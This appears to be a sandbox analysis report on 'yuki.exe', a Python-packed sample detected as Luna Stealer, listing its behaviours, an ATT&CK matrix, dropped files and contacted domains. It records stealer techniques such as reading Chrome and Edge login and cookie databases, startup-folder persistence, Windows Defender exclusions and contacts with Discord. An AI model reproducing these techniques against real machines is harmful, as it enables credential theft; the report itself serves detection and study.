Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\Desktop\yuki.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\Desktop\yuki.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62402\_ctypes.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81FD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6C81FD010
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8215C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6C8215C00
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

barindex
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\luna.aes
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\luna.aesJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
3
Disable or Modify Tools
1
OS Credential Dumping
2
System Time Discovery
Remote Services1
Archive Collected Data
12
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
12
Registry Run Keys / Startup Folder
11
Process Injection
1
Deobfuscate/Decode Files or Information
LSASS Memory2
File and Directory Discovery
Remote Desktop Protocol1
Data from Local System
1
Remote Access Software
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts11
Command and Scripting Interpreter
Logon Script (Windows)12
Registry Run Keys / Startup Folder
21
Obfuscated Files or Information
Security Account Manager23
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Software Packing
NTDS41
Security Software Discovery
Distributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA Secrets1
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials31
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Masquerading
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
Virtualization/Sandbox Evasion
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550819 Sample: yuki.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 72 raw.githubusercontent.com 2->72 74 discord.com 2->74 76 206.23.85.13.in-addr.arpa 2->76 92 Antivirus / Scanner detection for submitted sample 2->92 94 Sigma detected: Powershell Defender Disable Scan Feature 2->94 96 Modifies Windows Defender protection settings 2->96 98 6 other signatures 2->98 9 yuki.exe 1001 2->9         started        13  ?  .scr 2->13         started        signatures3 process4 file5 56 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 9->56 dropped 58 C:\Users\user\AppData\Local\...\python312.dll, PE32+ 9->58 dropped 60 C:\Users\...\opencv_videoio_ffmpeg4100_64.dll, PE32+ 9->60 dropped 68 103 other files (5 malicious) 9->68 dropped 108 Detected Luna Stealer 9->108 110 Drops PE files with a suspicious file extension 9->110 112 Drops PE files to the startup folder 9->112 114 4 other signatures 9->114 15 yuki.exe 1 41 9->15         started        62 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 13->62 dropped 64 C:\Users\user\AppData\Local\...\python312.dll, PE32+ 13->64 dropped 66 C:\Users\...\opencv_videoio_ffmpeg4100_64.dll, PE32+ 13->66 dropped 70 103 other files (5 malicious) 13->70 dropped 20  ?  .scr 13->20         started        signatures6 process7 dnsIp8 78 raw.githubusercontent.com 185.199.109.133, 443, 49738 FASTLYUS Netherlands 15->78 80 discord.com 162.159.138.232, 443, 54136, 54256 CLOUDFLARENETUS United States 15->80 54 C:\Users\user\AppData\Roaming\...\?  .scr, PE32+ 15->54 dropped 84 Modifies Windows Defender protection settings 15->84 86 Adds extensions / path to Windows Defender exclusion list 15->86 88 Adds a directory exclusion to Windows Defender 15->88 22 cmd.exe 15->22         started        25 cmd.exe 1 15->25         started        27 cmd.exe 15->27         started        82 185.199.110.133, 443, 54169 FASTLYUS Netherlands 20->82 90 Tries to harvest and steal browser information (history, passwords, etc) 20->90 29 cmd.exe 20->29         started        31 cmd.exe 20->31         started        33 cmd.exe 20->33         started        file9 signatures10 process11 signatures12 102 Adds a directory exclusion to Windows Defender 22->102 35 powershell.exe 22->35         started        38 powershell.exe 22->38         started        46 2 other processes 22->46 104 Modifies Windows Defender protection settings 25->104 106 Uses attrib.exe to hide files 25->106 40 powershell.exe 23 25->40         started        42 conhost.exe 25->42         started        48 2 other processes 27->48 50 4 other processes 29->50 52 2 other processes 31->52 44 conhost.exe 33->44         started        process13 signatures14 100 Loading BitLocker PowerShell Module 40->100

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
yuki.exe100%AviraTR/ATRAPS.Gen
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_ARC4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_Salsa20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_chacha20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_pkcs1_decode.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_aes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_aesni.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_arc2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_blowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_cast.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_cbc.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_cfb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ctr.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_des.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_des3.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ecb.pyd3%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ocb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ofb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_BLAKE2b.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_BLAKE2s.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_MD2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_MD4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_MD5.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_RIPEMD160.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA1.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA224.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA256.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA384.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA512.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_ghash_clmul.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_ghash_portable.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_keccak.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_poly1305.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Math\_modexp.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Protocol\_scrypt.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_curve25519.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_curve448.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_ec_ws.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_ed25519.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_ed448.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Util\_cpuid_c.pyd3%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Util\_strxor.pyd3%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imaging.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imagingcms.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imagingmath.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imagingtk.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_webp.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\VCRUNTIME140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_asyncio.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_cffi_backend.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_ctypes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_decimal.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_elementtree.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_multiprocessing.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_overlapped.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_queue.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_socket.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_sqlite3.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_ssl.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_uuid.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\_wmi.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\charset_normalizer\md.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\charset_normalizer\md__mypyc.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\cryptography\hazmat\bindings\_rust.pyd8%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\cv2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\mat_wrapper\__init__.py0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\misc\__init__.py0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\opencv_videoio_ffmpeg4100_64.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\utils\__init__.py0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\libcrypto-3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\libffi-8.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\libssl-3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\lz4\_version.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\lz4\block\_block.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy.libs\libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy.libs\msvcp140-d64049c6e3865410a7dda6a7e9f0c575.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\_core\_multiarray_tests.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\_core\_multiarray_umath.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\fft\_pocketfft_umath.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\linalg\_umath_linalg.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_bounded_integers.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_common.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_generator.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_mt19937.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_pcg64.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_philox.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_sfc64.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\bit_generator.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\mtrand.cp312-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\psutil\_psutil_windows.pyd3%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\pyexpat.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\python3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\python312.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\pywin32_system32\pywintypes312.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\select.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI62402\sqlite3.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://hosted.weblate.org/projects/iso-codes/iso-639-5/hr/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-3/sc/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/nah/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-3/ru/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-4217/sc/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-2/ko/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/fy/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-2/is/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-15924/nb/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/tl/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-5/tr/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-5/id/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-2/kab/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-3/kab/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-3/kmr/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-2/hr/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-15924/ia/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-3/zu/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ug/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/yo/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-2/tr/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/zh_Hant_HK/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/sk/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-5/ru/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-4217/kab/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/te/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-3/zh_Hant_HK/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/br/0%Avira URL Cloudsafe
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-5/uk/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/kl/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-15924/zh_Hant_HK/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-5/lt/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-3/ps/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/mi/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-2/ky/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-3/ar/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-4217/sr/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-5/pl/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-3/pt_BR/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/kab/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-3/sr/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/son/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-2/sr/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-3/pa_PK/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-5/nb_NO/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/sv/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-15924/ta/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-5/fr/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/mhr/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/th/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-3/zh_Hans/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-3/ta/0%Avira URL Cloudsafe
https://salsa.debian.org/iso-codes-team/iso-codes/issues0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/sw/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-3/hr/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-15924/ka/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/zu/0%Avira URL Cloudsafe
https://hosted.weblat0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-15924/si/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/uk/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ti/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-639-3/zh_Hant/0%Avira URL Cloudsafe
https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ve/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.138.232
truefalse
    high
    raw.githubusercontent.com
    185.199.109.133
    truefalse
      high
      206.23.85.13.in-addr.arpa
      unknown
      unknownfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://hosted.weblate.org/projects/iso-codes/iso-3166-2/ko/yuki.exe, 00000000.00000003.1718884771.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://hosted.weblate.org/projects/iso-codes/iso-639-5/hr/yuki.exe, 00000000.00000003.1707868772.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, iso639-5.mo11.17.drfalse
        • Avira URL Cloud: safe
        unknown
        https://hosted.weblate.org/projects/iso-codes/iso-3166-1/fy/iso3166-1.mo40.17.drfalse
        • Avira URL Cloud: safe
        unknown
        https://hosted.weblate.org/projects/iso-codes/iso-15924/nb/ ? .scr, 00000011.00000003.2113561071.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://hosted.weblate.org/projects/iso-codes/iso-3166-2/is/ ? .scr, 00000011.00000003.2106133151.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://hosted.weblate.org/projects/iso-codes/iso-3166-1/tl/ ? .scr, 00000011.00000003.2133732428.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://hosted.weblate.org/projects/iso-codes/iso-3166-3/sc/yuki.exe, 00000000.00000003.1727203822.0000021E0C702000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2125873023.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://hosted.weblate.org/projects/iso-codes/iso-3166-1/nah/ ? .scr, 00000011.00000003.2113561071.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://hosted.weblate.org/projects/iso-codes/iso-4217/sc/ ? .scr, 00000011.00000003.2125998712.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
